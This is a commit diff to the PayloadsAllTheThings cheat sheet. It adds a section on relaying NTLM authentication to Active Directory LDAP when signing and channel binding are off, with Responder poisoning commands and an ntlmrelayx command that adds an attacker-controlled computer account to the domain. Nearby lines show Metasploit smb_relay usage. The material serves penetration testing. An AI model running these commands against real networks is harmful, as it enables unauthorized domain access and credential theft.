mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Add injection into AD through ldap signing not required and ldap channel binding disabled
This commit is contained in:
parent
8b543c80aa
commit
0f4d747913
@ -69,6 +69,7 @@
|
||||
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
|
||||
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
||||
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
- [LDAP signing not required and LDAP channel binding disabled](#ldap-signing-not-required-and-ldap-channel-binding-disabled)
|
||||
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
|
||||
- [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
|
||||
- [Drop the MIC](#drop-the-mic)
|
||||
@ -2162,6 +2163,23 @@ msf > use exploit/windows/smb/smb_relay
|
||||
msf exploit(smb_relay) > show targets
|
||||
```
|
||||
|
||||
### LDAP signing not required and LDAP channel binding disabled
|
||||
|
||||
During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
|
||||
* LDAP signing not required (by default set to `Not required`)
|
||||
* LDAP channel binding is disabled. (by default disabled)
|
||||
* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
|
||||
|
||||
Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
|
||||
```bash
|
||||
# On first terminal
|
||||
sudo ./Responder.py -I eth0 -wfrd -P -v
|
||||
|
||||
# On second terminal
|
||||
sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer
|
||||
```
|
||||
It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection.
|
||||
|
||||
### SMB Signing Disabled and IPv4
|
||||
|
||||
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning**
|
||||
|
Loading…
Reference in New Issue
Block a user